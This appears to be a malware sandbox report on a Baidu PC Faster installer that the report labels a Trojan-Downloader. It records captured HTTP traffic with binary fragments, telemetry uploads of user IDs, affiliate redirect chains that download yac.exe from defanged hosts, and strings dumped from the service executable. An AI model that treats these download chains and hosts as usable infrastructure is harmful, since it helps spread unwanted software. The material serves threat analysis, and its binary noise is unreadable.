bt`.W....!.... .cT........3Y...6...^.. ..... ......h../...e$.`..(..d..
.J....n}....8W....!.8<.8.h.m.C.3.-.)9..A..<....../a......m@wN.I&
gt;. f./.K.\A.z........g......t...............y.e.8.<#q....w....b.(
..S..<...y....@......A..ho...."A..........G(...S.[.E4.i..5.........
.S .<IY.R....7.7........wz..}..j%......5.qDS.....7p..CM....,...,...
.1..u..n..EB[.<.....{..$.|..xGI..vj{....eJ{.0.M..Jf...g............
.Lk.tU.........K...e.c5.,~.....2....lg...3...o..,..d.u.J1g_0..v...
GET /pcf_data/2014.12.09.115357/GameList.xml.7z HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: 5.0.4.87531
Host: updown.pcfaster.baidu.co.th
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: JSP2/1.0.17B
Date: Sat, 20 Dec 2014 15:44:03 GMT
Content-Type: application/xml
Connection: keep-alive
Content-Length: 88830
CDN-key: 24dbbd980169401e9c0b0eb84b3d86b9
Accept-Ranges: bytes
Last-Modified: Thu, 11 Dec 2014 02:16:00 GMT
ETag: "349c1ce-15afe-509e75b745800"
CDN-AGE: 17z..'.....z..Z......\............w........3.a`.....f...'D.$.."8..S...5>>
..Xn....W..(<U../.w........E...n;]...],.s..Q.Qo...Hc...gHv.XF.p.O.f
.......`<..J.J..T....&..|..X.p..@..G...j.E..J."...k.l..5..}_X....N.
.....T.. .. $F.nD.*........._..L.1.0.k..Y..W..D.<.y..(..Ne......]..
..<....g.....iv...BKQW. ^.M..~...L........b;..4.9p..}.m.nK.)..8Y...
k..;.*u...... ......./}p.}.t.y#.)B/$)..Y....&.-..HW.....7N.YL0p..'%.G.
.*..BY.@.79..H......./..V{.I.....zPGY)..q.FV......2..S..a.....D|.....e
.?.#..x.'w...s..}.O.,.o.AU.-....4..]%e....=*...h...f...T..t.YL......%p
C.....Rq..^....,|w.0_.>.1..l|.jIUq..-.}....y4@oTV.(1....`.U.....)1.
...."kD....-5!X.5..!._,E1.....6.Jl.F.z.'.^.pUB......Xeu.n&...?ki...\9#
.E.....7..~...~......^~4.9[....z.N.).1.....K#>e....[.......Z....a..
o...........t7O2Y.(x.h.......I..~...... .G.].7.$D\r..Fh..]...P...y7..s
;}..........@.P.C...,R'...U.f$.~._l).....4........B.H*\...........>
.YI.....,.3...{.v..3Bs.6.X....C.....(......k.....$............x4...\Q.
ht-W...E.\,r.KL&....@.AH......F..).`.H.%..^......D.......,.PJ.O.5....;
..L..t......ji...Bc.%r...]\....t.UM......_R....p...,.......D....Z6j.g.
...Dd.s0B..a^.a......J.......0..7..8W...1.V.......9.....\...S[..WR;.t.
....``.Q|.&...~....o.81(.[..v....z..B....z......x.....ztk..h...S......
@A.gg..A.....y&..... '..R.y........7......&...../Y...CL...u.4bmz...A..
.JV&.#..|.(L..d#?`%/...&x.}..C....O...Q.Fg...Q....;f!.v..j.D8nf.......
.9..H...X..)\H.......X1(.#......9..J.....r|f"R...M........&)....@.....
mg.Y..N..O.ARY.t.u.6..w'N..%.8..(3..O.... ZX7.l!...Q.4....{7#...,?
GET /5.0.7.99579/baidu_update/BaiduStore.dll.7z HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: 5.0.4.87531
Host: updown.pcfaster.baidu.co.th
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: JSP2/1.0.17B
Date: Sat, 20 Dec 2014 15:44:07 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
Content-Length: 283242
CDN-key: 2862d8afe83a21010b2fb23db7460b81
Accept-Ranges: bytes
Last-Modified: Thu, 04 Dec 2014 06:48:50 GMT
ETag: "6b3c096-4526a-5095e5a4b1880"
CDN-AGE: 17z..'...;.0..Q......j.......2 ...&..p.........../D.N..tF..s.....}.....>>
<...*........:.>..#s..\.b...bi..@.^..gw`.e.....D.w.F!...Q....R..
:..p..C...."..........#....[. >.......e...WQ_..xg.c:..........Wp...
F.T.>......`;.-.H.V.. ....8.z.8.\........*R.......p.q...c......>
.B4.^ ....V$Z...:x].~"..eND.T....W....AS...?../.O3.?..M...l@.>L...s
I.v.K/..d...`x...B..)B...*fT...h.7N.Kl5B.p...S".#....-..)..W.j@B....A.
.T.R..\..=.^..J;D.~.v...Q.w...7n.5.zv.........h....N..wDHW]..#..I.S...
f#._7.X"|.z.y..y.......=....>.z.:.N.....X;t...}.22.j'.....E,I......
....Ia.<."Z.*5 U............Y#..g2tS....K.....ZW...p%w........z...v
....R1......1i-.'..UEb....9U....}/(.`V2..4.2,>...u...V...{......."~
(W....<...0.~2k:nx.....`../.5..oB....Ril...kty.."@.5w..3.......=..c
..*...2.r..'......[ .....$*].....\.B..MM....O.{..:.m..DN....-sM[.4.Hj.
..E....LZJ.\|........7l....NOKI...x..Xj..{m<f.{X.J l,s^..1.......u.
.`.6....^.H.9....".;....`......%~/......"9H..7..'7._..h7.......b.II..^
.w....t..7..-I......YhZ)......1.]h......#}..Xv........bv~.n.0.?3..?[ q
o....*.5)...QA k.V6_.05nf.sf....V..m._...X...!@.{.\.........*)... .q_&
lt;...?[..............:_m.}I>.].....B..U.....q.$....w.....]......@`
.x.=r7zR...xDj......].g.1..C5.-..0...P..>.....4..".."nG....N ...c..
N."g..Ki:M..*".....`E5.tz.^....4vY!RY.... ...mi...\....gUg.c.._..d. ..
.LK......xN........r.b@r......-....M..T~..k.......Q-Yw.a#.a...?K8.Q..,
....... Tp.o.8...?..a*..C.,Xz.G...........=.B)...XD...>k..a..%.H..S
.EX......)....5...#.N..@C..nb.%.D..I.Z..&;.e..D....NX..|.y..g...N.
GET /5.0.7.99579/baidu_update/BavConfig.ini.7z HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: 5.0.4.87531
Host: updown.pcfaster.baidu.co.th
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: JSP2/1.0.17B
Date: Sat, 20 Dec 2014 15:44:10 GMT
Content-Type: text/plain
Connection: keep-alive
Content-Length: 814
CDN-key: 6cd67f1a586ed6ff53ee1fcb1b482aaf
Accept-Ranges: bytes
Last-Modified: Thu, 04 Dec 2014 06:48:58 GMT
ETag: "3514011-32e-5095e5ac52a80"
CDN-AGE: 17z..'...:v.M........\........,.Q.......=M4.k...s:>~.....D.........\
...:..i.dUo...i........~X...w..k.s.T.8.m.0.$...b.r.].]...mE.9..p9.....
..../._..AIV#...n..6ri.......sK...........eL...........{..i. ..J.!....
~.@..W..om%W........I}l.=b...E&.'n.1...,.L|.R......VM{..~.&G.. .s-&=..
&x.o=l...._=.].UZ..... o...c...vh....0.G......af.r.k.~?.-..]........^.
.a......~..].[4...B.._..s..DT.y......J-...7.....y..4..fM.....d......Ga
.T9v9..~.a..]@...`...9!.:. k/..9.Wr5...o...<. ;..U.Y.':.i......,V..
@.....IHf.p/..Y..?.a...8~=!lV.9dW.........W*.....~.H&.w...A.........~.
Bt....foPp.."..A...^.te...h7.....v....9.@m..L.fY.h^.w ....w".JIc.H.' .
..x,...M....)g........2....*.C.g...b..VJ....UU.........m.......@:.;...
......G..............l.&.yU...............#....]......$...............
B.a.v.C.o.n.f.i.g...i.n.i......."._.:....... .........
GET /5.0.7.99579/baidu_update/BavData.dll.7z HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: 5.0.4.87531
Host: updown.pcfaster.baidu.co.th
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: JSP2/1.0.17B
Date: Sat, 20 Dec 2014 15:44:10 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
Content-Length: 59017
CDN-key: f8fe5af83e4abef37c225b53f94023df
Accept-Ranges: bytes
Last-Modified: Thu, 04 Dec 2014 06:49:04 GMT
ETag: "4f3400c-e689-5095e5b20b800"
CDN-AGE: 17z..'.....y.........d.......wx...&..p.........../D.N..T.!.P.A? ....qt.>>
..\.....8..hnlX.P..OYt.45.Yi.J..........p.?9...<..a.d.*(?... .....x
2.z2?........j.P)O.F..[.e....`...... .6~s.X....!n..>9!9...*s4*.6.@.
.z.`..|[...~:8r..m5..7.hoViu.d.^v....B_......0......&...iba.Sk.e....`s
.'N.i$...Q....../.;)...'..'.Z.....2.rm.t8..u.b...^....._k.P0........ :
..[n..c.0x3.v..V.P.....m.<e.A.k..#2...Yb[.4.I.N.}C}K.k...........X.
G.....m......(R(D}....Y.........>...R,.C...:..]..W.s._..L..U....f"n
.....C8#..m.I.4.....:Z.8...<2.2..*U.tM..a....i....D......@........B
. .U..Y...rY........)c..^).\..N........O.=...../.`C..8j....5H.#.r..N.e
..DR....@..<Hy.k$.....$.........` 8l...).]...N7I....".._.BS....V...
.bn...........,....2.R..{.:...?..v.o.....}B..ev2t?qE.=..D..#.C.:F...r
'..{.&M3k}....C>........h.W..>m..2.....%.q...F. ...Z..".A.....7.
3.).!........XG.j.2.........:..PH..y.p>.......g.a$}@.......5.#k.W.d
j.u..Z..XO...ILs...<@...]wRv.f...._i.$*..&....y.@"....}8.....9..S..
1.O.d..Z...wT...M^.....J....:..:Qe.....5l7. Q.....b.Cz..._.A.m._I.M~..
.Y... u...`.w.b... ....z...cZ.7.6..?...%.]..~.}..)...............8b...
..R.....|#.MR..'`............'V. U.........fCU,...4-.9.L-......(....2j
.*..`.......;A.T{t."/..._........3QV.)...h.....F...H.`f.....\q>.za
.7W~.....OI.i....x.X..94&...o..........].&o3fP0#....|.....t..0........
CYf.flpV......OB........q.`N..J....y.G/...i{....tyG.4C..Q.A...n~_rLO4.
....o..|z!.sO,.x..R...D...}t.az.j{...p.kMn...p..p..`...........Ul.....
}k.._..2h..4.[.W.N ..X:.b>.W....#,@.....N.....hwQT.t.a...upm.=.
GET /5.0.7.99579/baidu_update/bdMiniDownloaderNoUITH_PCF-Mini.exe-0x28c94e73ef2c18ee861292961f5add28.diff HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: 5.0.4.87531
Host: updown.pcfaster.baidu.co.th
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: JSP2/1.0.17B
Date: Sat, 20 Dec 2014 15:44:10 GMT
Content-Type: text/plain
Connection: keep-alive
Content-Length: 87772
CDN-key: 290af484e8c0812aba4579bf0ab587d6
Accept-Ranges: bytes
Last-Modified: Thu, 04 Dec 2014 06:48:51 GMT
ETag: "6b3c0a2-156dc-5095e5a5a5ac0"
CDN-AGE: 1BSDIFF40[.......y...............BZh91AY&SY.3....".....................>>
.................tQI..hUQP\]:......cE.$>.A@..&..T!%&"".=M.S.).y.i.J
~.S=S...4.&.MS.4....z..I.."yM=.....?A5=OI.(.i.&.<..M1.?T.....=.4...
....=..G.z.S.oE<.."6.eO..I..i..&..4`#.!.M.6M..'......Lj4=M6..<.5
...&.4h..h.M=&.4`5...4i...........S..i......j....L........<P.G.FSa1
G....G....... 4..@4=@d....Pz.=@....5=.......S.jy.I...=O. .C.i........R
z2'.....A...Q.4..4..........4....G..h... %.SzMA...4.C.....M..@..= ....
...z........4........4....H!...L..F.M.=.#LS.d.44OSM6........F.....=.C.
.z.....L.D.&.S.e4i.&..4i....M.....%$..........VT..'..K$KQ.....".F..%.A
.r.....Vn.J..X;.E.F...KB.R)k..Y...,.Rs...U.......i#7..(...R....,m. .R.
.,.."..(.3iE.c"...D.......F-9L..D%.b..*8i:.YL.....L.M..3V..%...Ygm$...
I.%.,...T.\g.Jh...,.k..G.@..M<.O..GM...`exS;E.;#.8....SJ.2..0{.tP..
...x..h..`y.Q."&..V.X.?.P.......&.E 9.vu|...lt/^'.*..B...n5. o..t~.[f.
.*......hK..!z.....n.p\....Z\...0\ ..../D...`p.........k..^.#}..q.}.)&
lt;..z..5....2.0.....Yp..4......K....(..I..2{.........f.4.........>
..:G.x....#5.`0.........D......bS9.WJ..RO9..F...HA..$......a.....e.U..
.yIL..#<g.....&'..8hF.1..y.AU....."..j!..m..8z..T...'0........XI...
&..:...Z.<?.b...c..W.@..A...X.O...:..B......Ni..RBw5..N.w3.dv.C.J'~
mll...|.h.,F`...........i..v.-...i,. ....s..{.!&@...12-F..T.9.2o.&.&..
(P1)k......;.28 'Y..(Ah.hP.".#..#..{g...k*.4....H95>..d..16&.P.....
6:Y.@.....~....n{c.y.............9[...K...*...|.6-1..MwIY...%..>.Z.
.."%..B.S...!.p......#.HuHP..._!a.....Rl...5?P.../..>J|..v.5Wr.
GET /5.0.7.99579/baidu_update/bdMiniDownloaderNoUITH_PCF-Mini.exe.7z HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: 5.0.4.87531
Host: updown.pcfaster.baidu.co.th
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: JSP2/1.0.17B
Date: Sat, 20 Dec 2014 15:44:11 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
Content-Length: 573397
CDN-key: 15fac72fe67ad87bb65a1727cd73bef3
Accept-Ranges: bytes
Last-Modified: Thu, 04 Dec 2014 06:48:58 GMT
ETag: "351401c-8bfd5-5095e5ac52a80"
CDN-AGE: 17z..'.....4.!....................&..p.........../D.N..tF..s.....}.....>>
<...*........:.>..#s..\.b...bi..@.^..gw`.e.....k&...O.)...834...
5uM.6....Ha...}r.B..Od.....f]..pMa.... .0.x.....V`......J..w.m.%.:..2.
k.......%...[D#..G}m.v..h.KH..//j.Y.[}......z/.X..:.........p.........
....C.K.....eVr P-CV..l=.{.1.......5.E.p......a.R. \.nL..E:..i).....G.
....S.?~..!.....<C%..H....(...........`.i$.hYD.......R...J..I.'..".
4NY...D.{.Z..t..G.%.....9.C................JJ].....@37S....E&.u...e>
;.... .......B..*k.!.....q..-.}..c.....w...`....G..b...c...I3'Cf..Y...
.hX....B.V......xg....]L.'.mT.m7n.. .....2..p....>-...)...\.\..Q".i
XO$k2D.#..._...];.8E........c.....\2|x.m..R#.......n......J .0.i..@.{.
IR..l.........xG].....| ..R....^'l~..pY. ..b..q......5s........Y,..d..
...3.2\..Q.......6p.$e....5... .Yl...:.[.{......Q.F....`sd.d.9....>
sCE......D.f..B..b%W..A.>STCc...'d..s.1k...a.T q...e..v.e....,.....
c..B."...3...PI....YI..x.5.....1 ....9...C.=~.. T .n2[.....5..I.KA _n9
>.G.L...B.c...|IZ...u.R.-...?.5.........|E^..%g..7.73...~...p,.....
.pl.....2....$}%.'....j),.....A....a..."..L..PI97A.../..Te.E..g.y..B..
./............b.......'.=5.9..b..'......O*.E.7.......d.......f]-m..S.5
..:......q._&&......m.r..P....7.....QwY.T.}..\..,3e.M,(....,.x.F..n.L7
.{.........G.;.I......J....x.H.......#...S...........5.........p....`E
j..6.al4..G....s~.....6...........K.....U..........,....Zj...B..s...T.
.F.....0...)...Ko....)CQ#K.......s/$..E.W..;&JJ..J.;.;. ....-.=.._W?%.
......st...S..M.*Q.T..~V.\2.....'.0...&..m.!. ... .8....2...aa.K.M
POST /cgi-bin-py/mini_install_statistic_info.cgi HTTP/1.1
Accept: */*
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=------8c0b1854487e4016848c70dd0dae8ad7
User-Agent: BaiduIS/1.0
Host: sync.pcfaster.baidu.com.eg
Content-Length: 826
Connection: Keep-Alive
--------8c0b1854487e4016848c70dd0dae8ad7
Content-Disposition: form-data; name="ufile01"; filename="rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-33-51-0529-[7545].dat"
Content-Type: application/octet-stream
.......;......"...{.e.9.3.9.6.7.5.8.9.2.6.1.1.2.1.7.d.3.7.e.7.d.a.1.2.c.5.5.d.0.3.7.}...........................................................................................................................................................................................M......#......A#......]..............^..............p..........H.0.0.0.0.0.0.0.0.-.0.0.0.C.2.9.6.8.1.7.B.B.!.0.0.c.c.4.4.a.8.-.0.b.f.d.-.4.d.1.a.-.8.e.7.a.-.4.7.4.5.2.9.6.3.5.d.9.e.@.#.0.0.0.C.2.9.6.8.1.7.B.B..........D.i.r.e.c.t.A.g.e.n.t.s.|.b.r.|.I.B.D.|.B.a.n.n.e.r..........A...
--------8c0b1854487e4016848c70dd0dae8ad7--
HTTP/1.1 200 OK
Server: nginx/1.3.9
Date: Sat, 20 Dec 2014 15:43:36 GMT
Content-Type: text/plain
Content-Length: 7
Connection: Keep-Alivesuccess..
HEAD /PC_Faster_Setup_B104.exe?userid={e939675892611217d37e7da12c55d037}&rand=666B747F HTTP/1.1
Range: bytes=0-
Host: dl2.security.baidu.co.th
Accept: */*
User-Agent: PC_Faster_Setup_Mini_B104_1443275604.0.0.80846
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Server: JSP2/1.0.17B
Date: Sat, 20 Dec 2014 15:42:18 GMT
Content-Type: application/x-msdownload
Content-Length: 21768400
Connection: keep-alive
Last-Modified: Fri, 26 Sep 2014 08:37:07 GMT
ETag: "3bc46a5-14c28d0-503f3d27e92c0"
Accept-Ranges: bytes
Age: 1176463
X-Cache: HIT from baidu-cdn
Via: 1.1 baidu-cdn:7301 (squid/2.7.STABLE9)
CDN-AGE: 0
Content-Range: bytes 0-21768399/21768400
GET /ads/adsavess?sid=yac&ptid=mat&subid=123101&clickID=20Bxhl1vJnZ4PiAA3noevs1y2mau000.&lplink=hXXp://VVV.yac.mx/ssc/yac.php?pt=mat&pubid=16319&ce_cid=20Bxhl1vJnZ4PiAA3noevs1y2mau000. HTTP/1.1
Accept: */*
User-Agent: Setup Factory 8.0
Connection: Keep-Alive
Cache-Control: no-cache
Host: s2s.yac.mx
HTTP/1.1 302 Moved Temporarily
Server: ngx_openresty
Date: Sat, 20 Dec 2014 15:42:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.22
Set-Cookie: PHPSESSID=drf57lh6dkv8a933lm7eeqrpn6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
302 Found HTTP/1.1:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Location: hXXp://VVV.yac.mx/ssc/yac.php?pt=mat192..<div style='background-color: #ccc; height: 100%; left: 0px; p
osition: absolute; top: 0px; width: 100%;'>.<div style='backgrou
nd-color: #fff; border: 2px solid #f00; left: 0px; margin: 5px; paddin
g: 3px; position: absolute; text-align: center; top: 0px; width: 95%;
z-index: 99;'>.<p>Please See: <a href='hXXp://VVV.yac.mx/s
sc/yac.php?pt=mat'>hXXp://VVV.yac.mx/ssc/yac.php?pt=mat</a>&l
t;/p>.</div>.</div>...0..
GET /dl.php?file=/download/ds/yac.exe HTTP/1.1
User-Agent: DownloadFile
Host: rd.yac.mx
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: ngx_openresty
Date: Sat, 20 Dec 2014 15:42:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.22
Location: hXXp://dl2.yac.mx/download/ds/yac.exe0..
POST /cgi-bin-py/get_pcf_statistic_info.cgi HTTP/1.1
Accept: */*
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=------588406a095b34de89bef5b25ef1f858d
User-Agent: BaiduIS/1.0
Host: sync.pcfaster.baidu.com.eg
Content-Length: 1044
Connection: Keep-Alive
--------588406a095b34de89bef5b25ef1f858d
Content-Disposition: form-data; name="ufile01"; filename="rpFile-Baidu_Secure_SystemUp_5.0.4.87531-2014-12-20 12-34-14-0404-[8244].dat"
Content-Type: application/octet-stream
.......U......"...{.e.9.3.9.6.7.5.8.9.2.6.1.1.2.1.7.d.3.7.e.7.d.a.1.2.c.5.5.d.0.3.7.}.................................................................................................................................................................................................Z.......\.......].......r..............u............D.i.r.e.c.t.A.g.e.n.t.s.|.b.r.|.I.B.D.|.B.a.n.n.e.r.|.P.C._.F.a.s.t.e.r._.S.e.t.u.p._.M.i.n.i._.B.1.0.4._.1.4.4.3.2.7.5.6.0...e.x.e.|.B.a.i.d.u. .P.C. .F.a.s.t.e.r. .M.i.n.i.S.e.t.u.p.|.4.,.0.,.0.,.8.0.8.4.6.|.B.a.i.d.u. .P.C. .F.a.s.t.e.r.|.4.,.0.,.0.,.8.0.8.4.6.|.C.o.p.y.r.i.g.h.t. .(.C.). .2.0.1.4. .B.a.i.d.u.,. .I.n.c... .A.l.l. .r.i.g.h.t.s. .r.e.s.e.r.v.e.d...|.1.9.4.7.K.B..........D.i.r.e.c.t.A.g.e.n.t.s.|.b.r.|.I.B.D.|.B.a.n.n.e.r...
--------588406a095b34de89bef5b25ef1f858d--
HTTP/1.1 200 OK
Server: nginx/1.3.9
Date: Sat, 20 Dec 2014 15:43:36 GMT
Content-Type: text/plain
Content-Length: 7
Connection: Keep-Alivesuccess..
GET /v4/yac-newdl/vmwarexvirtualxidexhardxdrive_00000000000000000001?action=application.exit.vm HTTP/1.1
Host: xa.xingcloud.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 20 Dec 2014 15:42:14 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v448..{"stats":"ok","time":"0.60 ms","message":"store 1 action and 0 upd
ate "}..0......
GET /v4/yac-newdl/vmwarexvirtualxidexhardxdrive_00000000000000000001?action=download.start HTTP/1.1
Host: xa.xingcloud.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 20 Dec 2014 15:42:15 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v449..{"stats":"ok","time":"81.95 ms","message":"store 1 action and 0 up
date "}..0..
GET /cgi-bin-py/get_channel_info.cgi?install_channel=DirectAgents|br|IBD|Banner&version=5.0.4.87531&errorcode=0&errortext=&userid=e939675892611217d37e7da12c55d037&old_userid=00000000-000C296817BB!00cc44a8-0bfd-4d1a-8e7a-474529635d9e@#000C296817BB&install_time=2014-12-20 10:33:18&install_time_num=1419064398&cost_time=38&file_created_time=2014-12-20 10:32:59 HTTP/1.1
Accept: */*
Cache-Control: no-cache
Host: sync.pcfaster.baidu.com.eg
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 22
Content-Type: text/html;charset=utf-8
Connection: Keep-Aliveupload channel info ok..
GET /cgi/ip/getCode.php HTTP/1.1
Host: pcfaster.baidu.com.eg
Accept: */*
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 15:43:05 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 37
Connection: Keep-Alive
Content-Type: text/html{"ip":""%local server IP%"","country":"CA"}....
GET /cgi/ip/getCode.php HTTP/1.1
Host: pcfaster.baidu.com.eg
Accept: */*
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 15:43:05 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 37
Connection: Keep-Alive
Content-Type: text/html{"ip":""%local server IP%"","country":"CA"}..
GET /adclick.php?pid=7026&wmid=4361&chc=1?= HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Setup Factory 8.0
Host: ads.sprintrade.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Date: Sat, 20 Dec 2014 15:42:01 GMT
Server: Apache/2.2.15 (Red Hat)
Last-Modified: Sat, 20 Dec 2014 15:42:01 GMT
P3P: policyref="hXXps://help.adspirit.de/w3c/adspirit.p3p", CP="NOI DSP COR NID PSAo PSDo IVAo IVDo OUR STP UNI COM NAV DEM"
Cache-Control: no-store, no-cache, must-revalidate
Expires: 0
Pragma: no-cache
x-own: 80.237.180.18
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Set-Cookie: sprintrade_uxid=2b50fb7c5a4ef29925c4ec2191f8ccca3923c4315c6a82c616c1779495c3ebaf; expires=Mon, 19-Jan-2015 15:42:01 GMT; domain=.sprintrade.com; path=/
x-mcdata: 1
x-mcdata-k: 831_37
Set-Cookie: sprintrade_AdCl_p_831=7026; expires=Tue, 20-Jan-2015 15:42:02 GMT; domain=.sprintrade.com; path=/
Set-Cookie: sprintrade_AdCl_wm_831=4361; expires=Tue, 20-Jan-2015 15:42:02 GMT; domain=.sprintrade.com; path=/
Set-Cookie: sprintrade_AdCl_d_831=1419090121; expires=Tue, 20-Jan-2015 15:42:02 GMT; domain=.sprintrade.com; path=/
Set-Cookie: sprintrade_AdCl_c_831=1; expires=Tue, 20-Jan-2015 15:42:02 GMT; domain=.sprintrade.com; path=/
x-ip: "%local server IP%"
x-ipx: /538b7108459200607cb0bc306644bf46
x-ct: 3600 / 0
x-ad: 7026/831/4361/8909/10470/-1/4/1
Set-Cookie: sprintrade_AdCl_trk_831=ap7026w4361t1419090121; expires=Tue, 20-Jan-2015 15:42:02 GMT; domain=.sprintrade.com; path=/
Connection: close
Location: hXXp://trk2it1.com/?a=10577&oc=1837&c=8086&s1=&s1=8909&s2=ap7026w4361t1419090121
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
GET /?a=10577&oc=1837&c=8086&s1=&s1=8909&s2=ap7026w4361t1419090121 HTTP/1.1
Accept: */*
User-Agent: Setup Factory 8.0
Host: trk2it1.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: hXXp://smarttrk.com/?a=10577&oc=1837&c=8086&s1=&s1=8909&s2=ap7026w4361t1419090121&ckmguid=fe51e140-bf10-4736-9486-c2beb18e2817
Server: Microsoft-IIS/7.5
Set-Cookie: .sess=dsbeihc4ma01dgmca5tsxfct; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 20 Dec 2014 15:41:46 GMT
Content-Length: 267<html><head><title>Object moved</title></he
ad><body>..<h2>Object moved to <a href="hXXp://smart
trk.com/?a=10577&oc=1837&c=8086&s1=&s1=8909&s2=ap7
026w4361t1419090121&ckmguid=fe51e140-bf10-4736-9486-c2beb18e2817"&
gt;here</a>.</h2>..</body></html>....
GET /download/ds/yac.exe HTTP/1.1
User-Agent: DownloadFile
Connection: Keep-Alive
Cache-Control: no-cache
Host: dl2.yac.mx
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 20 Dec 2014 15:42:32 GMT
Content-Type: application/octet-stream
Content-Length: 15227600
Last-Modified: Tue, 16 Dec 2014 10:41:11 GMT
Connection: keep-alive
Expires: Mon, 19 Jan 2015 15:42:32 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes._...3})..5\*.;......Oj..z.~....C........P.....>1.....3.~...J.I....>>
u.RM.L....-.&.xA.o..h..(....u..%o.......I....!Z.....Q..X...FH.D(......
.2$..c.-.................._...GF..E.e.y...evz.X..Rf...../.S... ..i..k.
. ...9.w.~.f.oY.$.F..bs,..}.hO........!..v,.U4?.v?=.a.....O.x..I......
<.mUQ.RO..#.(.T............\rzpd..z.M...5.g...$m....zr.....?....^..
.......(~/..y.1.4.....R...P.PQ...L2..J.z..M.".).o.I.>P.....v/F1..&g
t;E_.5hq.....cbB.&..$v...[.....m..a\.{A.0qLW.*.v,a....~.@..u&.b..xd...
.o.._.Tc..B.:m....&.ZA...CZRw..t4.Vy..D.'.X....j......K.J....[.-....?O
..hl.r...!.Y..4...Z...1[!.Q....7e*.6.s...CE.... ........8...........m.
).p................H....ZH..^%......%@.P.z...5.....;.......6.....bgw&l
t;Um)....Y.~.vv...WZH..h]. ......W.xz..v. v......p.U.8.n./..A......"q.
....D./...p..h.5;...7.O...........m....?..[...&U....].*..n,....hZ.Q...
N:l.." .VM....]."'...2....:b7=.x...O.....y..u..5.....k...{..x.DK...v..
<f0...&.#..o7.V.<.Ad...D.m..<.n.b...N..d.x...ac.Ox....O......
>..yM.qp:...S8`..........*w*J.u.'?...A.I...*m.zN.p.]6!).....|/.....
.J....F...,.{<AM.dYg..H.F<...!..j....#~.(N..[`.c.'v.)....V....{v
.X.....@.,......dZF.2.3A....."..<*2h..u.....~..h.....p..-...?..."..
.M.D.MkR.G..1.}MB..S.........Qx..o.........0 ..X...x..............%6p.
.@5.7M]]a!....$O..NO..7....."..<.MM.~...8..W4|L...K3t..:........:..
.w......1..b1..!./../?7..}[.Q,.-.7..|n.."....#.........R.... ...J.....
..g......6...B......=..U.........5...a....>.."..*.F..mQ.sl..iP..Zj.
.1...4.%....vk_./..........X..DY\.......\?$$.bHr.n.....ib......7..
The Trojan-Downloader connects to the servers at the folowing location(s):
Map
Strings from Dumps
PCFasterSvc.exe_1820:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
vSSSh
vSSSh
FTPjK
FTPjK
FtPj;
FtPj;
C.PjRV
C.PjRV
CNotSupportedException
CNotSupportedException
hhctrl.ocx
hhctrl.ocx
CCmdTarget
CCmdTarget
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
portuguese-brazilian
portuguese-brazilian
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
%s$x$x
%s$x$x
%s$%x
%s$%x
mscoree.dll
mscoree.dll
coredll.dll
coredll.dll
-60%!<:>
-60%!<:>
$x
$x
;3:'84!<:>
;3:'84!<:>
6666666666666666
6666666666666666
BHips.dll
BHips.dll
Thread %d: invalid start address X!!!
Thread %d: invalid start address X!!!
%d: BaseThreadStart = X
%d: BaseThreadStart = X
kernel32.dll
kernel32.dll
message %d, %X, %X, %X
message %d, %X, %X, %X
KrnMsg
KrnMsg
\\.\PhysicalDrive%d
\\.\PhysicalDrive%d
\\.\Scsi%d:
\\.\Scsi%d:
00000000
00000000
s:\app\gensoft\security-client\pc-faster\public\output\pdb\PCFasterSvc.pdb
